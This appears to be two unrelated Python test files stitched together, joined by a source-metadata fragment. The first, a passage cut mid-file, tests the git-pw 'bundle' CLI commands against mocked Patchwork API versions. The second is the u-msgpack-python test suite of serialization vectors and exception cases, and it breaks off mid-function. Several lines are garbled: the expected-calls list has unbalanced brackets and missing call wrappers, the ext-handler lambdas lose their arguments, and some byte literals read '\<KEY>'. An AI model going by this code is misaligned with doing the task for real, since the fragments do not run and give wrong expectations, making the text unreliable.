mock_log.warning.called @mock.patch('git_pw.api.LOG') def test_list_with_multiple_filters(self, mock_log, mock_echo, mock_index, mock_version): """Validate behavior with use of multiple filters. Patchwork API v1.0 did not support multiple filters correctly. Ensure the user is warned as necessary if they specify multiple filters. """ people_rsp = [self._get_users()] bundle_rsp = [self._get_bundle()] mock_index.side_effect = [people_rsp, people_rsp, bundle_rsp] runner = CLIRunner() result = runner.invoke(bundle.list_cmd, ['--owner', 'john.doe', '--owner', 'user.b']) assert result.exit_code == 0, result assert mock_log.warning.called @mock.patch('git_pw.api.LOG') def test_list_api_v1_1(self, mock_log, mock_echo, mock_index, mock_version): """Validate behavior with API v1.1.""" mock_version.return_value = (1, 1) user_rsp = [self._get_users()] bundle_rsp = [self._get_bundle()] mock_index.side_effect = [user_rsp, bundle_rsp] runner = CLIRunner() result = runner.invoke(bundle.list_cmd, [ '--owner', 'john.doe', '--owner', 'user.b', '--owner', '<EMAIL>']) assert result.exit_code == 0, result # We should have only made a single call to '/users' (for the user # specified by an email address) since API v1.1 supports filtering with # usernames natively calls = ['users', [('q', '<EMAIL>')]),'bundles', [ ('owner', 'john.doe'), ('owner', 'user.b'), ('owner', 1), ('q', None), ('page', None), ('per_page', None), ('order', 'name')])] mock_index.assert_has_calls(calls) # We shouldn't see a warning about multiple versions either assert not mock_log.warning.called @mock.patch('git_pw.api.version', return_value=(1, 2)) @mock.patch('git_pw.api.create') @mock.patch('git_pw.utils.echo_via_pager') class CreateTestCase(unittest.TestCase): @staticmethod def _get_bundle(**kwargs): return ShowTestCase._get_bundle(**kwargs) def test_create(self, mock_echo, mock_create, mock_version): """Validate standard behavior.""" mock_create.return_value = self._get_bundle() runner = CLIRunner() result = runner.invoke(bundle.create_cmd, ['hello', '1', '2']) assert result.exit_code == 0, result mock_create.assert_called_once_with( 'bundles', [('name', 'hello'), ('patches', (1, 2)), ('public', False)] ) def test_create_with_public(self, mock_echo, mock_create, mock_version): """Validate behavior with --public option.""" mock_create.return_value = self._get_bundle() runner = CLIRunner() result = runner.invoke(bundle.create_cmd, [ 'hello', '1', '2', '--public']) assert result.exit_code == 0, result mock_create.assert_called_once_with( 'bundles', [('name', 'hello'), ('patches', (1, 2)), ('public', True)] ) @mock.patch('git_pw.api.LOG') def test_create_api_v1_1( self, mock_log, mock_echo, mock_create, mock_version ): mock_version.return_value = (1, 1) runner = CLIRunner() result = runner.invoke(bundle.create_cmd, ['hello', '1', '2']) assert result.exit_code == 1, result assert mock_log.error.called @mock.patch('git_pw.api.version', return_value=(1, 2)) @mock.patch('git_pw.api.update') @mock.patch('git_pw.api.detail') @mock.patch('git_pw.utils.echo_via_pager') class UpdateTestCase(unittest.TestCase): @staticmethod def _get_bundle(**kwargs): return ShowTestCase._get_bundle(**kwargs) def test_update(self, mock_echo, mock_detail, mock_update, mock_version): """Validate standard behavior.""" mock_update.return_value = self._get_bundle() runner = CLIRunner() result = runner.invoke( bundle.update_cmd, ['1', '--name', 'hello', '--patch', '1', '--patch', '2'], ) assert result.exit_code == 0, result mock_detail.assert_not_called() mock_update.assert_called_once_with( 'bundles', '1', [('name', 'hello'), ('patches', (1, 2))] ) def test_update_with_public( self, mock_echo, mock_detail, mock_update, mock_version, ): """Validate behavior with --public option.""" mock_update.return_value = self._get_bundle() runner = CLIRunner() result = runner.invoke(bundle.update_cmd, ['1', '--public']) assert result.exit_code == 0, result mock_detail.assert_not_called() mock_update.assert_called_once_with('bundles', '1', [('public', True)]) @mock.patch('git_pw.api.LOG') def test_update_api_v1_1( self, mock_log, mock_echo, mock_detail, mock_update, mock_version, ): mock_version.return_value = (1, 1) runner = CLIRunner() result = runner.invoke(bundle.update_cmd, ['1', '--name', 'hello']) assert result.exit_code == 1, result assert mock_log.error.called @mock.patch('git_pw.api.version', return_value=(1, 2)) @mock.patch('git_pw.api.delete') @mock.patch('git_pw.utils.echo_via_pager') class DeleteTestCase(unittest.TestCase): def test_delete(self, mock_echo, mock_delete, mock_version): """Validate standard behavior.""" mock_delete.return_value = None runner = CLIRunner() result = runner.invoke(bundle.delete_cmd, ['hello']) assert result.exit_code == 0, result mock_delete.assert_called_once_with('bundles', 'hello') @mock.patch('git_pw.api.LOG') def test_delete_api_v1_1( self, mock_log, mock_echo, mock_delete, mock_version, ): """Validate standard behavior.""" mock_version.return_value = (1, 1) runner = CLIRunner() result = runner.invoke(bundle.delete_cmd, ['hello']) assert result.exit_code == 1, result assert mock_log.error.called @mock.patch('git_pw.api.version', return_value=(1, 2)) @mock.patch('git_pw.api.update') @mock.patch('git_pw.api.detail') @mock.patch('git_pw.utils.echo_via_pager') class AddTestCase(unittest.TestCase): @staticmethod def _get_bundle(**kwargs): return ShowTestCase._get_bundle(**kwargs) def test_add( self, mock_echo, mock_detail, mock_update, mock_version, ): """Validate standard behavior.""" mock_detail.return_value = self._get_bundle() mock_update.return_value = self._get_bundle() runner = CLIRunner() result = runner.invoke(bundle.add_cmd, ['1', '1', '2']) assert result.exit_code == 0, result mock_detail.assert_called_once_with('bundles', '1') mock_update.assert_called_once_with( 'bundles', '1', [('patches', (1, 2, 42))], ) @mock.patch('git_pw.api.LOG') def test_add_api_v1_1( self, mock_log, mock_echo, mock_detail, mock_update, mock_version, ): """Validate behavior with API v1.1.""" mock_version.return_value = (1, 1) runner = CLIRunner() result = runner.invoke(bundle.add_cmd, ['1', '1', '2']) assert result.exit_code == 1, result assert mock_log.error.called @mock.patch('git_pw.api.version', return_value=(1, 2)) @mock.patch('git_pw.api.update') @mock.patch('git_pw.api.detail') @mock.patch('git_pw.utils.echo_via_pager') class RemoveTestCase(unittest.TestCase): @staticmethod def _get_bundle(**kwargs): return ShowTestCase._get_bundle(**kwargs) def test_remove( self, mock_echo, mock_detail, mock_update, mock_version, ): """Validate standard behavior.""" mock_detail.return_value = self._get_bundle( patches=[{'id': 1}, {'id': 2}, {'id': 3}], ) mock_update.return_value = self._get_bundle() runner = CLIRunner() result = runner.invoke(bundle.remove_cmd, ['1', '1', '2']) assert result.exit_code == 0, result mock_detail.assert_called_once_with('bundles', '1') mock_update.assert_called_once_with( 'bundles', '1', [('patches', (3,))], ) @mock.patch('git_pw.bundle.LOG') def test_remove_empty( self, mock_log, mock_echo, mock_detail, mock_update, mock_version, ): """Validate behavior when deleting would remove all patches.""" mock_detail.return_value = self._get_bundle( patches=[{'id': 1}, {'id': 2}, {'id': 3}], ) mock_update.return_value = self._get_bundle() runner = CLIRunner() result = runner.invoke(bundle.remove_cmd, ['1', '1', '2', '3']) assert result.exit_code == 1, result.output assert mock_log.error.called mock_detail.assert_called_once_with('bundles', '1') mock_update.assert_not_called() @mock.patch('git_pw.api.LOG') def test_remove_api_v1_1( self, mock_log, mock_echo, mock_detail, mock_update, mock_version, ): """Validate behavior with API v1.1.""" mock_version.return_value = (1, 1) runner = CLIRunner() result = runner.invoke(bundle.remove_cmd, ['1', '1', '2']) assert result.exit_code == 1, result assert mock_log.error.called ```
{ "source": "00-matt/u-msgpack-python", "score": 2 }
#### File: 00-matt/u-msgpack-python/ ```python import sys import struct import unittest import datetime import io from collections import OrderedDict, namedtuple import umsgpack single_test_vectors = [ # None ["nil", None, b"\xc0"], # Booleans ["bool false", False, b"\xc2"], ["bool true", True, b"\xc3"], # + 7-bit uint ["7-bit uint", 0x00, b"\x00"], ["7-bit uint", 0x10, b"\x10"], ["7-bit uint", 0x7f, b"\x7f"], # - 5-bit int ["5-bit sint", -1, b"\xff"], ["5-bit sint", -16, b"\xf0"], ["5-bit sint", -32, b"\xe0"], # 8-bit uint ["8-bit uint", 0x80, b"\xcc\x80"], ["8-bit uint", 0xf0, b"\xcc\xf0"], ["8-bit uint", 0xff, b"\xcc\xff"], # 16-bit uint ["16-bit uint", 0x100, b"\xcd\x01\x00"], ["16-bit uint", 0x2000, b"\xcd\x20\x00"], ["16-bit uint", 0xffff, b"\xcd\xff\xff"], # 32-bit uint ["32-bit uint", 0x10000, b"\xce\x00\x01\x00\x00"], ["32-bit uint", 0x200000, b"\xce\x00\x20\x00\x00"], ["32-bit uint", 0xffffffff, b"\xce\xff\xff\xff\xff"], # 64-bit uint ["64-bit uint", 0x100000000, b"\xcf\x00\x00\x00\x01\x00\x00\x00\x00"], ["64-bit uint", 0x200000000000, b"\xcf\x00\x00\x20\x00\x00\x00\x00\x00"], ["64-bit uint", 0xffffffffffffffff, b"\xcf\xff\xff\xff\xff\xff\xff\xff\xff"], # 8-bit int ["8-bit int", -33, b"\xd0\xdf"], ["8-bit int", -100, b"\xd0\x9c"], ["8-bit int", -128, b"\xd0\x80"], # 16-bit int ["16-bit int", -129, b"\xd1\xff\x7f"], ["16-bit int", -2000, b"\xd1\xf8\x30"], ["16-bit int", -32768, b"\xd1\x80\x00"], # 32-bit int ["32-bit int", -32769, b"\xd2\xff\xff\x7f\xff"], ["32-bit int", -1000000000, b"\xd2\xc4\x65\x36\x00"], ["32-bit int", -2147483648, b"\xd2\x80\x00\x00\x00"], # 64-bit int ["64-bit int", -2147483649, b"\xd3\xff\xff\xff\xff\x7f\xff\xff\xff"], ["64-bit int", -1000000000000000002, b"\xd3\xf2\x1f\x49\x4c\x58\x9b\xff\xfe"], ["64-bit int", -9223372036854775808, b"\xd3\x80\x00\x00\x00\x00\x00\x00\x00"], # 64-bit float ["64-bit float", 0.0, b"\xcb\x00\x00\x00\x00\x00\x00\x00\x00"], ["64-bit float", 2.5, b"\xcb\x40\x04\x00\x00\x00\x00\x00\x00"], ["64-bit float", float(10**35), b"\xcb\x47\x33\x42\x61\x72\xc7\x4d\x82"], # Fixstr String ["fix string", u"", b"\xa0"], ["fix string", u"a", b"\xa1\x61"], ["fix string", u"abc", b"\xa3\x61\x62\x63"], ["fix string", u"a" * 31, b"\xbf" + b"\x61" * 31], # 8-bit String ["8-bit string", u"b" * 32, b"\xd9\x20" + b"b" * 32], ["8-bit string", u"c" * 100, b"\xd9\x64" + b"c" * 100], ["8-bit string", u"d" * 255, b"\xd9\xff" + b"d" * 255], # 16-bit String ["16-bit string", u"b" * 256, b"\xda\x01\x00" + b"b" * 256], ["16-bit string", u"c" * 65535, b"\xda\xff\xff" + b"c" * 65535], # 32-bit String ["32-bit string", u"b" * 65536, b"\xdb\x00\x01\x00\x00" + b"b" * 65536], # Wide character String ["wide char string", u"Allagbé", b"\xa8Allagb\xc3\xa9"], ["wide char string", u"По оживлённым берегам", b"\xd9\x28\xd0\x9f\xd0\xbe\x20\xd0\xbe\xd0\xb6\xd0\xb8\xd0\xb2\xd0\xbb\xd1\x91\xd0\xbd\xd0\xbd\xd1\x8b\xd0\xbc\x20\xd0\xb1\xd0\xb5\xd1\x80\xd0\xb5\xd0\xb3\xd0\xb0\xd0\xbc"], # 8-bit Binary ["8-bit binary", b"\x80" * 1, b"\xc4\x01" + b"\x80" * 1], ["8-bit binary", b"\x80" * 32, b"\xc4\x20" + b"\x80" * 32], ["8-bit binary", b"\x80" * 255, b"\xc4\xff" + b"\x80" * 255], # 16-bit Binary ["16-bit binary", b"\x80" * 256, b"\xc5\x01\x00" + b"\x80" * 256], # 32-bit Binary ["32-bit binary", b"\x80" * 65536, b"\xc6\x00\x01\x00\x00" + b"\x80" * 65536], # Fixext 1 ["fixext 1", umsgpack.Ext(0x05, b"\x80" * 1), b"\xd4\x05" + b"\x80" * 1], # Fixext 2 ["fixext 2", umsgpack.Ext(0x05, b"\x80" * 2), b"\xd5\x05" + b"\x80" * 2], # Fixext 4 ["fixext 4", umsgpack.Ext(0x05, b"\x80" * 4), b"\xd6\x05" + b"\x80" * 4], # Fixext 8 ["fixext 8", umsgpack.Ext(0x05, b"\x80" * 8), b"\xd7\x05" + b"\x80" * 8], # Fixext 16 ["fixext 16", umsgpack.Ext(0x05, b"\x80" * 16), b"\xd8\x05" + b"\x80" * 16], # 8-bit Ext ["8-bit ext", umsgpack.Ext(0x05, b"\x80" * 255), b"\xc7\xff\x05" + b"\x80" * 255], # 16-bit Ext ["16-bit ext", umsgpack.Ext(0x05, b"\x80" * 256), b"\xc8\x01\x00\x05" + b"\x80" * 256], # 32-bit Ext ["32-bit ext", umsgpack.Ext(0x05, b"\x80" * 65536), b"\xc9\x00\x01\x00\x00\x05" + b"\x80" * 65536], # Empty Array ["empty array", [], b"\x90"], # Empty Map ["empty map", {}, b"\x80"], # 32-bit Timestamp ["32-bit timestamp", datetime.datetime(1970, 1, 1, 0, 0, 0, 0, umsgpack._utc_tzinfo), b"\xd6\xff\x00\x00\x00\x00"], ["32-bit timestamp", datetime.datetime(2000, 1, 1, 10, 5, 2, 0, umsgpack._utc_tzinfo), b"\xd6\xff\x38\x6d\xd1\x4e"], # 64-bit Timestamp ["64-bit timestamp", datetime.datetime(2000, 1, 1, 10, 5, 2, 1234, umsgpack._utc_tzinfo), b"\xd7\xff\x00\x4b\x51\x40\x38\x6d\xd1\x4e"], ["64-bit timestamp", datetime.datetime(2200, 1, 1, 10, 5, 2, 0, umsgpack._utc_tzinfo), b"\xd7\xff\x00\x00\x00\x01\xb0\x9e\xa6\xce"], ["64-bit timestamp", datetime.datetime(2200, 1, 1, 10, 5, 2, 1234, umsgpack._utc_tzinfo), b"\xd7\xff\x00\x4b\x51\x41\xb0\x9e\xa6\xce"], # 96-bit Timestamp ["96-bit timestamp", datetime.datetime(1900, 1, 1, 10, 5, 2, 0, umsgpack._utc_tzinfo), b"\xc7\x0c\xff\x00\x00\x00\x00\xff\xff\xff\xff\x7c\x56\x0f\x4e"], ["96-bit timestamp", datetime.datetime(1900, 1, 1, 10, 5, 2, 1234, umsgpack._utc_tzinfo), b"\xc7\x0c\xff\x00\x12\xd4\x50\xff\xff\xff\xff\x7c\x56\x0f\x4e"], ["96-bit timestamp", datetime.datetime(3000, 1, 1, 10, 5, 2, 0, umsgpack._utc_tzinfo), b"\xc7\x0c\xff\x00\x00\x00\x00\x00\x00\x00\x07\x91\x5f\x59\xce"], ["96-bit timestamp", datetime.datetime(3000, 1, 1, 10, 5, 2, 1234, umsgpack._utc_tzinfo), b"\xc7\x0c\xff\x00\x12\xd4\x50\x00\x00\x00\x07\x91\x5f\x59\xce"], ] composite_test_vectors = [ # Fix Array ["fix array", [5, u"abc", True], b"\x93\x05\xa3\x61\x62\x63\xc3"], # 16-bit Array ["16-bit array", [0x05] * 16, b"\xdc\x00\x10" + b"\x05" * 16], ["16-bit array", [0x05] * 65535, b"\xdc\xff\xff" + b"\x05" * 65535], # 32-bit Array ["32-bit array", [0x05] * 65536, b"\xdd\x00\x01\x00\x00" + b"\x05" * 65536], # Fix Map ["fix map", OrderedDict([(1, True), (2, u"abc"), (3, b"\x80")]), b"\x83\x01\xc3\x02\xa3\x61\x62\x63\x03\xc4\x01\x80"], ["fix map", {u"abc": 5}, b"\x81\xa3\x61\x62\x63\x05"], ["fix map", {b"\x80": 0xffff}, b"\x81\xc4\x01\x80\xcd\xff\xff"], ["fix map", {True: None}, b"\x81\xc3\xc0"], # 16-bit Map ["16-bit map", OrderedDict([(k, 0x05) for k in range(16)]), b"\xde\x00\x10" + b"".join([struct.pack("B", i) + b"\x05" for i in range(16)])], ["16-bit map", OrderedDict([(k, 0x05) for k in range(6000)]), b"\xde\x17\x70" + b"".join([struct.pack("B", i) + b"\x05" for i in range(128)]) + b"".join([b"\xcc" + struct.pack("B", i) + b"\x05" for i in range(128, 256)]) + b"".join([b"\xcd" + struct.pack(">H", i) + b"\x05" for i in range(256, 6000)])], # Complex Array ["complex array", [True, 0x01, umsgpack.Ext(0x03, b"foo"), 0xff, OrderedDict([(1, False), (2, u"abc")]), b"\x80", [1, 2, 3], u"abc"], b"\x98\xc3\x01\xc7\x03\x03\x66\x6f\x6f\xcc\xff\x82\x01\xc2\x02\xa3\x61\x62\x63\xc4\x01\x80\x93\x01\x02\x03\xa3\x61\x62\x63"], # Complex Map ["complex map", OrderedDict([(1, [OrderedDict([(1, 2), (3, 4)]), {}]), (2, 1), (3, [False, u"def"]), (4, OrderedDict([(0x100000000, u"a"), (0xffffffff, u"b")]))]), b"\x84\x01\x92\x82\x01\x02\x03\x04\x80\x02\x01\x03\x92\xc2\xa3\x64\x65\x66\x04\x82\xcf\x00\x00\x00\x01\x00\x00\x00\x00\xa1\x61\xce\xff\xff\xff\xff\xa1\x62"], # Map with Tuple Keys ["map with tuple keys", OrderedDict([((u"foo", False, 3), True), ((3e6, -5), u"def")]), b"\x82\x93\xa3\x66\x6f\x6f\xc2\x03\xc3\x92\xcb\x41\x46\xe3\x60\x00\x00\x00\x00\xfb\xa3\x64\x65\x66"], # Map with Complex Tuple Keys ["map with complex tuple keys", {(u"foo", (1, 2, 3), 3): -5}, b"\x81\x93\xa3\x66\x6f\x6f\x93\x01\x02\x03\x03\xfb"] ] pack_exception_test_vectors = [ # Unsupported type exception ["unsupported type", set([1, 2, 3]), umsgpack.UnsupportedTypeException], ["unsupported type", -2**(64 - 1) - 1, umsgpack.UnsupportedTypeException], ["unsupported type", 2**64, umsgpack.UnsupportedTypeException], ] unpack_exception_test_vectors = [ # Type errors ["type error unpack unicode string", u"\x01", TypeError], ["type error unpack boolean", True, TypeError], # Insufficient data to unpack object ["insufficient data 8-bit uint", b"\xcc", umsgpack.InsufficientDataException], ["insufficient data 16-bit uint", b"\xcd\xff", umsgpack.InsufficientDataException], ["insufficient data 32-bit uint", b"\xce\xff", umsgpack.InsufficientDataException], ["insufficient data 64-bit uint", b"\xcf\xff", umsgpack.InsufficientDataException], ["insufficient data 8-bit int", b"\xd0", umsgpack.InsufficientDataException], ["insufficient data 16-bit int", b"\xd1\xff", umsgpack.InsufficientDataException], ["insufficient data 32-bit int", b"\xd2\xff", umsgpack.InsufficientDataException], ["insufficient data 64-bit int", b"\xd3\xff", umsgpack.InsufficientDataException], ["insufficient data 32-bit float", b"\xca\xff", umsgpack.InsufficientDataException], ["insufficient data 64-bit float", b"\xcb\xff", umsgpack.InsufficientDataException], ["insufficient data fixstr", b"\xa1", umsgpack.InsufficientDataException], ["insufficient data 8-bit string", b"\xd9", umsgpack.InsufficientDataException], ["insufficient data 8-bit string", b"\xd9\x01", umsgpack.InsufficientDataException], ["insufficient data 16-bit string", b"\xda\x01\x00", umsgpack.InsufficientDataException], ["insufficient data 32-bit string", b"\xdb\x00\x01\x00\x00", umsgpack.InsufficientDataException], ["insufficient data 8-bit binary", b"\xc4", umsgpack.InsufficientDataException], ["insufficient data 8-bit binary", b"\xc4\x01", umsgpack.InsufficientDataException], ["insufficient data 16-bit binary", b"\xc5\x01\x00", umsgpack.InsufficientDataException], ["insufficient data 32-bit binary", b"\xc6\x00\x01\x00\x00", umsgpack.InsufficientDataException], ["insufficient data fixarray", b"\x91", umsgpack.InsufficientDataException], ["insufficient data fixarray", b"\x92\xc2", umsgpack.InsufficientDataException], ["insufficient data 16-bit array", b"\xdc\x00\xf0\xc2\xc3", umsgpack.InsufficientDataException], ["insufficient data 32-bit array", b"\xdd\x00\x01\x00\x00\xc2\xc3", umsgpack.InsufficientDataException], ["insufficient data fixmap", b"\x81", umsgpack.InsufficientDataException], ["insufficient data fixmap", b"\x82\xc2\xc3", umsgpack.InsufficientDataException], ["insufficient data 16-bit map", b"\xde\x00\xf0\xc2\xc3", umsgpack.InsufficientDataException], ["insufficient data 32-bit map", b"\xdf\x00\x01\x00\x00\xc2\xc3", umsgpack.InsufficientDataException], ["insufficient data fixext 1", b"\xd4", umsgpack.InsufficientDataException], ["insufficient data fixext 1", b"\xd4\x05", umsgpack.InsufficientDataException], ["insufficient data fixext 2", b"\xd5\x05\x01", umsgpack.InsufficientDataException], ["insufficient data fixext 4", b"\xd6\x05\x01\x02\x03", umsgpack.InsufficientDataException], ["insufficient data fixext 8", b"\xd7\x05\x01\x02\x03", umsgpack.InsufficientDataException], ["insufficient data fixext 16", b"\xd8\x05\x01\x02\x03", umsgpack.InsufficientDataException], ["insufficient data ext 8-bit", b"\xc7\x05\x05\x01\x02\x03", umsgpack.InsufficientDataException], ["insufficient data ext 16-bit", b"\xc8\x01\x00\x05\x01\x02\x03", umsgpack.InsufficientDataException], ["insufficient data ext 32-bit", b"\xc9\x00\x01\x00\x00\x05\x01\x02\x03", umsgpack.InsufficientDataException], # Unhashable key { 1 : True, { 1 : 1 } : False } ["unhashable key", b"\<KEY>", umsgpack.UnhashableKeyException], # Unhashable key { [ 1, 2, {} ] : True } ["unhashable key", b"\<KEY>", umsgpack.UnhashableKeyException], # Key duplicate { 1 : True, 1 : False } ["duplicate key", b"\<KEY>", umsgpack.DuplicateKeyException], # Reserved code (0xc1) ["reserved code", b"\xc1", umsgpack.ReservedCodeException], # Unsupported timestamp (unsupported data length) ["unsupported timestamp", b"\xc7\x02\xff\xaa\xbb", umsgpack.UnsupportedTimestampException], # Invalid string (non utf-8) ["invalid string", b"\xa1\x80", umsgpack.InvalidStringException], ] compatibility_test_vectors = [ # Fix Raw ["fix raw", b"", b"\xa0"], ["fix raw", u"", b"\xa0"], ["fix raw", b"a", b"\xa1\x61"], ["fix raw", u"a", b"\xa1\x61"], ["fix raw", b"abc", b"\xa3\x61\x62\x63"], ["fix raw", u"abc", b"\xa3\x61\x62\x63"], ["fix raw", b"a" * 31, b"\xbf" + b"\x61" * 31], ["fix raw", u"a" * 31, b"\xbf" + b"\x61" * 31], # 16-bit Raw ["16-bit raw", u"b" * 32, b"\xda\x00\x20" + b"b" * 32], ["16-bit raw", b"b" * 32, b"\xda\x00\x20" + b"b" * 32], ["16-bit raw", u"b" * 256, b"\xda\x01\x00" + b"b" * 256], ["16-bit raw", b"b" * 256, b"\xda\x01\x00" + b"b" * 256], ["16-bit raw", u"c" * 65535, b"\xda\xff\xff" + b"c" * 65535], ["16-bit raw", b"c" * 65535, b"\xda\xff\xff" + b"c" * 65535], # 32-bit Raw ["32-bit raw", u"b" * 65536, b"\xdb\x00\x01\x00\x00" + b"b" * 65536], ["32-bit raw", b"b" * 65536, b"\xdb\x00\x01\x00\x00" + b"b" * 65536], ] float_precision_test_vectors = [ ["float precision single", 2.5, b"\xca\x40\x20\x00\x00"], ["float precision double", 2.5, b"\xcb\x40\x04\x00\x00\x00\x00\x00\x00"], ] tuple_test_vectors = [ ["nested array", [0x01, [b"\x80", [[u"a", u"b", u"c"], True]]], b"\x92\x01\x92\xc4\x01\x80\x92\x93\xa1a\xa1b\xa1c\xc3", (0x01, (b"\x80", ((u"a", u"b", u"c"), True)))], ] naive_timestamp_test_vectors = [ ["32-bit timestamp (naive)", datetime.datetime(2000, 1, 1, 10, 5, 2, 0, umsgpack._utc_tzinfo), b"\xd6\xff\x38\x6d\xd1\x4e", datetime.datetime(2000, 1, 1, 10, 5, 2, 0, umsgpack._utc_tzinfo)], ["64-bit timestamp (naive)", datetime.datetime(2200, 1, 1, 10, 5, 2, 1234, umsgpack._utc_tzinfo), b"\xd7\xff\x00\x4b\x51\x41\xb0\x9e\xa6\xce", datetime.datetime(2200, 1, 1, 10, 5, 2, 1234, umsgpack._utc_tzinfo)], ["96-bit timestamp (naive)", datetime.datetime(3000, 1, 1, 10, 5, 2, 1234, umsgpack._utc_tzinfo), b"\xc7\x0c\xff\x00\x12\xd4\x50\x00\x00\x00\x07\x91\x5f\x59\xce", datetime.datetime(3000, 1, 1, 10, 5, 2, 1234, umsgpack._utc_tzinfo)], ] CustomType = namedtuple('CustomType', ['x', 'y', 'z']) ext_handlers = { complex: lambda obj: umsgpack.Ext(0x20, struct.pack("<ff", obj.real, obj.imag)), CustomType: lambda obj: umsgpack.Ext(0x30, umsgpack.packb(list(obj))), 0x20: lambda ext: complex(*struct.unpack("<ff",, 0x30: lambda ext: CustomType(*umsgpack.unpackb(, } ext_handlers_test_vectors = [ ["complex", complex(1, 2), b"\xd7\x20\x00\x00\x80\x3f\x00\x00\x00\x40"], ["custom type", CustomType(b"abc", 123, True), b"\xd7\x30\x93\xc4\x03\x61\x62\x63\x7b\xc3"], ] override_ext_handlers = { datetime.datetime: lambda obj: umsgpack.Ext(0x40, obj.strftime("%Y%m%dT%H:%M:%S.%f").encode()), -0x01: lambda ext: ext, } override_ext_handlers_test_vectors = [ ["pack override", datetime.datetime(2000, 1, 1, 10, 5, 2, 0, umsgpack._utc_tzinfo), b'\xc7\x18@20000101T10:05:02.000000'], ["unpack override", umsgpack.Ext(-0x01, b"\x00\xbb\xcc\xdd\x01\x02\x03\x04\x05\x06\x07\x08"), b'\xc7\x0c\xff\x00\xbb\xcc\xdd\x01\x02\x03\x04\x05\x06\x07\x08'], ] # These are the only global variables that should be exported by umsgpack exported_vars_test_vector = [ "Ext", "InvalidString", "PackException", "UnpackException", "UnsupportedTypeException", "InsufficientDataException", "InvalidStringException", "UnsupportedTimestampException", "ReservedCodeException", "UnhashableKeyException", "DuplicateKeyException", "KeyNotPrimitiveException", "KeyDuplicateException", "ext_serializable", "pack", "packb", "unpack", "unpackb", "dump", "dumps", "load", "loads", "version", "compatibility", ] ########################################################################## class TestUmsgpack(unittest.TestCase): def test_pack_single(self): for (name, obj, data) in single_test_vectors: obj_repr = repr(obj) print("\tTesting {:s}: object {:s}".format( name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "...")) self.assertEqual(umsgpack.packb(obj), data) def test_pack_composite(self): for (name, obj, data) in composite_test_vectors: obj_repr = repr(obj) print("\tTesting {:s}: object {:s}".format( name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "...")) self.assertEqual(umsgpack.packb(obj), data) def test_pack_exceptions(self): for (name, obj, exception) in pack_exception_test_vectors: obj_repr = repr(obj) print("\tTesting {:s}: object {:s}".format( name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "...")) with self.assertRaises(exception): umsgpack.packb(obj) def test_unpack_single(self): for (name, obj, data) in single_test_vectors: obj_repr = repr(obj) print("\tTesting {:s}: object {:s}".format( name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "...")) unpacked = umsgpack.unpackb(data) # In Python2, we have both int and long integer types, but which # one we end up with depends on the architecture (32-bit/64-bit) if sys.version_info[0] == 2: # Allow both {int,long} -> unpackb -> {int,long} if isinstance(obj, int) or isinstance(obj, long): self.assertTrue(isinstance(unpacked, int) or isinstance(unpacked, long)) else: self.assertTrue(isinstance(unpacked, type(obj))) # In Python3, we only have the int integer type else: self.assertTrue(isinstance(unpacked, type(obj))) self.assertEqual(unpacked, obj) def test_unpack_composite(self): for (name, obj, data) in composite_test_vectors: obj_repr = repr(obj) print("\tTesting {:s}: object {:s}".format( name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "...")) self.assertEqual(umsgpack.unpackb(data), obj) def test_unpack_exceptions(self): for (name, data, exception) in unpack_exception_test_vectors: print("\tTesting {:s}".format(name)) with self.assertRaises(exception): umsgpack.unpackb(data) def test_pack_compatibility(self): umsgpack.compatibility = True for (name, obj, data) in compatibility_test_vectors: obj_repr = repr(obj) print("\tTesting {:s}: object {:s}".format( name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "...")) self.assertEqual(umsgpack.packb(obj), data) umsgpack.compatibility = False def test_unpack_compatibility(self): umsgpack.compatibility = True for (name, obj, data) in compatibility_test_vectors: obj_repr = repr(obj) print("\tTesting {:s}: object {:s}".format( name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "...")) unpacked = umsgpack.unpackb(data) # Encoded raw should always unpack to bytes in compatibility mode, # so convert any string obj to bytes before comparison if sys.version_info[0] == 3 and isinstance(obj, str): _obj = obj.encode('utf-8') elif sys.version_info[0] == 2 and isinstance(obj, unicode): _obj = bytes(obj) else: _obj = obj self.assertTrue(isinstance(unpacked, type(_obj))) self.assertEqual(unpacked, _obj) umsgpack.compatibility = False def test_unpack_invalid_string(self): # Use last unpack exception test vector (an invalid string) (_, data, _) = unpack_exception_test_vectors[-1] obj = umsgpack.unpackb(data, allow_invalid_utf8=True) self.assertTrue(isinstance(obj, umsgpack.InvalidString)) self.assertEqual(obj, b"\x80") def test_unpack_ordered_dict(self): # Use last composite test vector (a map) (_, obj, data) = composite_test_vectors[-1] # Unpack with default options (unordered dict) unpacked = umsgpack.unpackb(data) self.assertTrue(isinstance(unpacked, dict)) # Unpack with unordered dict unpacked = umsgpack.unpackb(data, use_ordered_dict=False) self.assertTrue(isinstance(unpacked, dict)) # Unpack with ordered dict unpacked = umsgpack.unpackb(data, use_ordered_dict=True) self.assertTrue(isinstance(unpacked, OrderedDict)) self.assertEqual(unpacked, obj) def test_unpack_tuple(self): # Use tuple test vector (_, obj, data, obj_tuple) = tuple_test_vectors[0] # Unpack with default options (list) self.assertEqual(umsgpack.unpackb(data), obj) # Unpack with use_tuple=False (list) self.assertEqual(umsgpack.unpackb(data, use_tuple=False), obj) # Unpack with use_tuple=True (tuple) self.assertEqual(umsgpack.unpackb(data, use_tuple=True), obj_tuple) def test_ext_exceptions(self): # Test invalid Ext type type with self.assertRaises(TypeError): _ = umsgpack.Ext(5.0, b"") # Test invalid data type with self.assertRaises(TypeError): _ = umsgpack.Ext(0, u"unicode string") # Test out of range Ext type value with self.assertRaises(ValueError): _ = umsgpack.Ext(-129, b"data") with self.assertRaises(ValueError): _ = umsgpack.Ext(128, b"data") def test_pack_ext_handler(self): for (name, obj, data) in ext_handlers_test_vectors: obj_repr = repr(obj) print("\tTesting {:s}: object {:s}".format( name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "...")) packed = umsgpack.packb(obj, ext_handlers=ext_handlers) self.assertEqual(packed, data) def test_unpack_ext_handler(self): for (name, obj, data) in ext_handlers_test_vectors: obj_repr = repr(obj) print("\tTesting {:s}: object {:s}".format( name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "...")) unpacked = umsgpack.unpackb(data, ext_handlers=ext_handlers) self.assertEqual(unpacked, obj) def test_pack_force_float_precision(self): for ((name, obj, data), 